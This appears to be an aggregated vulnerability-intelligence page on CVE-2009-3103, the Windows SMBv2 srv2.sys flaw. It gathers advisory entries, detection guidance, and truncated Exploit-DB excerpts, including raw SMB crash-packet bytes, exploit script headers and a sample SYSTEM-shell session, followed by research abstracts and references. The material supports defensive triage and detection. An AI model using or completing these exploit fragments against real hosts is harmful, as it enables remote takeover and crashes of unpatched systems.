CVE-2009-3103
Published: 2009-09-08
Priority: P1 · 81 · critical · 10 (CVSS 2.0, AV:N/AC:L/Au:N/C:C/I:C/A:C)
Tags: exploited in the wild (ITW), public exploit, VulnCheck KEV, ransomware, initial access
EPSS: 90.12% (99.8th percentile)
Array index error in the SMBv2 protocol implementation in srv2.sys in Microsoft Windows Vista Gold, SP1, and SP2, Windows Server 2008 Gold and SP2, and Windows 7 RC allows remote attackers to execute arbitrary code or cause a denial of service (system crash) via an & (ampersand) character in a Process ID High header field in a NEGOTIATE PROTOCOL REQUEST packet, which triggers an attempted dereference of an out-of-bounds memory location, aka "SMBv2 Negotiation Vulnerability." NOTE: some of these details are obtained from third party information.
Affected
1 range
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| microsoft | windows_server_2008 | — | — |
Detection & IOCs (extracted from sources)
- Detect CVE-2009-3103 exploitation by monitoring for an ampersand character in the Process ID High header field of SMBv2 NEGOTIATE PROTOCOL REQUEST packets on port 445/tcp.
- A malformed SMBv2 Negotiate Protocol Response (4-byte payload \x00\x00\x00\x01) immediately followed by connection close causes Windows SMB2 hosts to crash; monitor for anomalously short SMB negotiate responses on port 445.
- The Metasploit module ms09_050_smb2_negotiate_func_index (exploit/windows/smb/ms09_050_smb2_negotiate_func_index) targets port 445/tcp; alert on exploit traffic matching this module's 951-byte exploit packet.
- An SMB2 logoff request sent before a session has been correctly negotiated triggers a NULL pointer dereference in SRV2.SYS; monitor for out-of-order SMB2 LOGOFF commands on port 445/tcp.
- Use Nessus Plugin ID 40877 (uncredentialed network check) to remotely detect unpatched CVE-2009-3103 hosts.
- Note: the vulnerability is reliably exploitable only on 32-bit systems; 64-bit systems may not be exploitable with the same reliability.
- Note: the DoS variant (ms09_050_smb2_session_logoff) affects Vista SP1/SP2 and possibly Server 2008 SP1/SP2; its scope may differ from the RCE variant.
CVSS provenance
| Source | CVSS version | Score | Severity | Vector |
|---|---|---|---|---|
| NVD | 2.0 | 10.0 | CRITICAL | AV:N/AC:L/Au:N/C:C/I:C/A:C |
| VulnCheck | — | 10.0 | CRITICAL | — |
GHSA
GHSA-47wf-g7rm-46qq (ghsa_unreviewed · 2022-05-02 · severity HIGH) for CVE-2009-3103: Array index error in the SMBv2 protocol implementation in srv2.sys. Description identical to the NVD entry above.
VulnCheck
Microsoft Windows SMBv2 srv2.sys Remote Code Execution (vulncheck · 2009 · CVSS 10.0 · CRITICAL). Description identical to the NVD entry above.
Affected: Microsoft Windows
Required Action: Apply remediations or mitigations per vendor instructions or discontinue use of the product if remediation or mitigations are unavailable.
Known detection rules: none found.
Exploit-DB
Microsoft Windows - 'srv2.sys' SMB Code Execution (Python) (MS09-050) (exploitdb · 2016-02-26)
---
```python
# EDB-Note: Source ~ https://raw.githubusercontent.com/ohnozzy/Exploit/master/MS09_050.py
#!/usr/bin/python
# This module depends on the linux command line program smbclient.
# I can't find a python smb library for smb login. If you can find one, you can replace that part of the code with the smb login function in python.
# The idea is that after the evil payload is injected by the first packet, it needs to be triggered by an authentication event. Whether the authentication succeeds or not does not matter.
import tempfile
import sys
import subprocess
from socket import socket
from time import sleep
from smb.SMBConnection import SMBConnection
try:
    target = sys.argv[1]
except IndexError:
    print '\nUsage: %s \n' % sys.a
```
Exploit-DB
Microsoft Windows - 'srv2.sys' SMB Negotiate ProcessID Function Table Dereference (MS09-050) (exploitdb · 2010-08-17)
---
Microsoft SRV2.SYS SMB Negotiate ProcessID Function Table Dereference
Exploited by Piotr Bania // www.piotrbania.com
Exploit for Vista SP2/SP1 only, should be reliable!
Tested on:
- Vista SP2 (6.0.6002.18005)
- Vista SP1 Ultimate (6.0.6001.18000)
Kudos for: Stephen, HDM, Laurent Gaffie (bug) and all the mates I know, peace.
Special kudos for prdelka for testing this shit and all the hosters.
Sample usage:
```
> smb2_exploit.exe 192.167.0.5 45 0
> telnet 192.167.0.5 28876
Microsoft Windows [Version 6.0.6001]
Copyright (c) 2006 Microsoft Corporation. All rights reserved.
C:\Windows\system32>whoami
whoami
nt authority\system
C:\Windows\system32>
```
When all is done it should spawn a port TARGET_IP:2
Exploit-DB
Microsoft Windows - 'srv2.sys' SMB Negotiate ProcessID Function Table Dereference (MS09-050) (Metasploit) (exploitdb · 2010-07-03)
---
```ruby
##
# $Id: ms09_050_smb2_negotiate_func_index.rb 9669 2010-07-03 03:13:45Z jduck $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
	# The mixin/rank lines and the opening of initialize() were lost in extraction
	# (everything between "Metasploit3" and 'Name' was stripped); the standard
	# Metasploit 3 module skeleton is restored here so the fragment reads correctly.
	def initialize(info = {})
		super(update_info(info,
			'Name'        => 'Microsoft SRV2.SYS SMB Negotiate ProcessID Function Table Dereference',
			'Description' => %q{
				This module exploits an out of bounds function table dereference in the SMB
				request validation code of the SRV2.SYS driver included with Windows Vista, Windows 7
				release candidates (not RTM), and Windows 2008 Serv
```
Exploit-DB
Microsoft Windows - SMB2 Negotiate Protocol '0x72' Response Denial of Service (exploitdb · 2010-05-07)
---
```python
#!/usr/bin/python
# === EDIT – this exploit appears to be exactly the same one of one which was already found
# and fixed notified by Laurent Gaffié, I did not know this but his blog post can be found here:
# http://g-laurent.blogspot.com/2009/11/windows-7-server-2008r2-remote-kernel.html
import socket,sys,time
print "Maliformed negotiate protocol response and quickly closing the connection causes Windows machines supporting SMB2 to crash (leaves the system hanging and unresponsive) -- tested on Win 7 build 2600"
print "Written by Jelmer de Hen"
print "Published at http://h.ackack.net/?p=387"
smb = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
smb.bind(("", 445))
smb.listen(1)
smbconn, addr = smb.acc
```
Exploit-DB
Microsoft Windows 7/2008 R2 - Remote Kernel Crash (exploitdb · 2009-11-11)
---
```python
#!/usr/bin/python
# win7-crash.py:
# Trigger a remote kernel crash on Win7 and server 2008R2 (infinite loop)
# Crash in KeAccumulateTicks() due to NT_ASSERT()/DbgRaiseAssertionFailure() caused by an
# infinite loop.
# NO BSOD, YOU GOTTA PULL THE PLUG.
# To trigger it fast; from the target: \\this_script_ip_addr\BLAH , instantly crash
# Author: Laurent Gaffié
import SocketServer
packet = ("\x00\x00\x00\x9a" # ---> length should be 9e not 9a..
"\xfe\x53\x4d\x42\x40\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00"
"\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x41\x00\x01\x00\x02\x02\x00\
```
Exploit-DB
Microsoft Windows Vista/7 - SMB2.0 Negotiate Protocol Request Remote Blue Screen of Death (MS07-063) (exploitdb · 2009-09-09)
---
- Release date: September 7th, 2009
- Discovered by: Laurent Gaffié
- Severity: High

I. VULNERABILITY
Windows Vista, Server 2008 :) normal value should be "\x00\x00"
```python
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff\xff\xff\xfe"
"\x00\x00\x00\x00\x00\x6d\x00\x02\x50\x43\x20\x4e\x45\x54"
"\x57\x4f\x52\x4b\x20\x50\x52\x4f\x47\x52\x41\x4d\x20\x31"
"\x2e\x30\x00\x02\x4c\x41\x4e\x4d\x41\x4e\x31\x2e\x30\x00"
"\x02\x57\x69\x6e\x64\x6f\x77\x73\x20\x66\x6f\x72\x20\x57"
"\x6f\x72\x6b\x67\x72\x6f\x75\x70\x73\x20\x33\x2e\x31\x61"
"\x00\x02\x4c\x4d\x31\x2e\x32\x58\x30\x30\x32\x00\x02\x4c"
"\x41\x4e\x4d\x41\x4e\x32\x2e\x31\x00\x02\x4e\x54\x20\x4c"
"\x4d\x20\x30\x2e\x31\x32\x00\x02\x53\x4d\x42\x20\x32
```
Metasploit
Microsoft SRV2.SYS SMB2 Logoff Remote Kernel NULL Pointer Dereference (metasploit)
This module triggers a NULL pointer dereference in the SRV2.SYS kernel driver when processing an SMB2 logoff request before a session has been correctly negotiated, resulting in a BSOD. Affecting Vista SP1/SP2 (and possibly Server 2008 SP1/SP2), the flaw was resolved with MS09-050.
Metasploit
Microsoft SRV2.SYS SMB Negotiate ProcessID Function Table Dereference (metasploit)
This module exploits an out of bounds function table dereference in the SMB request validation code of the SRV2.SYS driver included with Windows Vista, Windows 7 release candidates (not RTM), and Windows 2008 Server prior to R2. Windows Vista without SP1 does not seem affected by this flaw.
Metasploit
MS09-050 Microsoft SRV2.SYS SMB Negotiate ProcessID Function Table Dereference (metasploit)
This module exploits an out of bounds function table dereference in the SMB request validation code of the SRV2.SYS driver included with Windows Vista, Windows 7 release candidates (not RTM), and Windows 2008 Server prior to R2. Windows Vista without SP1 does not seem affected by this flaw.
arXiv
Tiresias: Predicting Security Events Through Deep Learning (arxiv_fulltext · 2019-05-24)
Yun Shen, Enrico Mariconti, Pierre-Antoine Vervier, and Gianluca Stringhini (Symantec Research Labs; University College London; Boston University)
Published in: 2018 ACM SIGSAC Conference on Computer and Communications Security (CCS '18), October 15-19, 2018, Toronto, ON, Canada. DOI: 10.1145/3243734.3243811
## Abstract
With the increased complexity of modern computer attacks, there is a need for defenders not only to detect malicious activity as it happens, but also to predict the specific steps tha
arXiv
Securing The Kernel via Static Binary Rewriting and Program Shepherding (arxiv_fulltext · 2011-05-10)
## Abstract
Recent Microsoft security bulletins show that kernel vulnerabilities are becoming more and more important security threats. Despite the pretty extensive security mitigations many of the kernel vulnerabilities are still exploitable. Successful kernel exploitation typically grants the attacker maximum privilege level and results in total machine compromise.
To protect against kernel exploitation, we have developed a tool which statically rewrites the Microsoft Windows kernel as well as other kernel level modules. Such rewritten binary files allow us to monitor control flow transfers during operating system execution. At this point we are able to detect whether selected control transfer flow is valid or should be considered as an attack attempt.
Our solution is especially direc
Tenable
Using Nessus and Metasploit Together (blogs_tenable · 2011-08-08)
# Using Nessus and Metasploit Together
Paul Asadoorian, August 8, 2011
### Security Tools Working Together
This is the third in a series of posts that describe the use of Nessus on BackTrack 5. Previous posts covered how to activate Nessus on BackTrack 5 and how to integrate Nmap, Hydra, and Nikto with Nessus. In this post we will cover initiating Nessus scans from within Metasploit. Beginning with Nessus 4, Tenable introduced the Nessus API, which lets users programmatically interface with a Nessus server using XMLRPC. Zate Berg took the initiative to write modules in Metasploit that, among other things, can launch a Nessus scan and import the results into the Metasploit database. From there, we can find which hosts are vulnerable to exploitation, exploit
Tenable
Microsoft "Patch Tuesday" - The Aftermath (blogs_tenable · 2009-10-19)
# Microsoft "Patch Tuesday" - The Aftermath
Paul Asadoorian, October 19, 2009
### Black Tuesday
This month Microsoft released 13 new security advisories. While 13 sounds like a moderate number, digging into each of the security advisories reveals that each one actually patches multiple vulnerabilities, bringing the grand total to 34 individual vulnerabilities. Couple that with the recent Adobe announcements disclosing 29 vulnerabilities in the Adobe Reader product and the release of the associated patches, and administrators have their work cut out for them (note that Nessus plugins have been released to detect these vulnerabilities; refer to plugin IDs 42119 and 42120). Assessing the risk for your organization when there are this many patches in common softwar
Greynoiseio
NoiseLetter March 2025 (blogs_greynoiseio)
References
- http://archives.neohapsis.com/archives/fulldisclosure/2009-09/0090.html
- http://blog.48bits.com/?p=510
- http://g-laurent.blogspot.com/2009/09/windows-vista7-smb20-negotiate-protocol.html
- http://isc.sans.org/diary.html?storyid=7093
- http://osvdb.org/57799
- http://secunia.com/advisories/36623
- http://www.exploit-db.com/exploits/9594
- http://www.kb.cert.org/vuls/id/135940
- http://www.microsoft.com/technet/security/advisory/975497.mspx
- http://www.reversemode.com/index.php?option=com_content&task=view&id=64&Itemid=1
- http://www.securityfocus.com/archive/1/506300/100/0/threaded
- http://www.securityfocus.com/archive/1/506327/100/0/threaded
- http://www.securityfocus.com/bid/36299
- http://www.securitytracker.com/id?1022848
- http://www.us-cert.gov/cas/techalerts/TA09-286A.html
- https://docs.microsoft.com/en-us/security-updates/securitybulletins/2009/ms09-050
- https://exchange.xforce.ibmcloud.com/vulnerabilities/53090
- https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A6489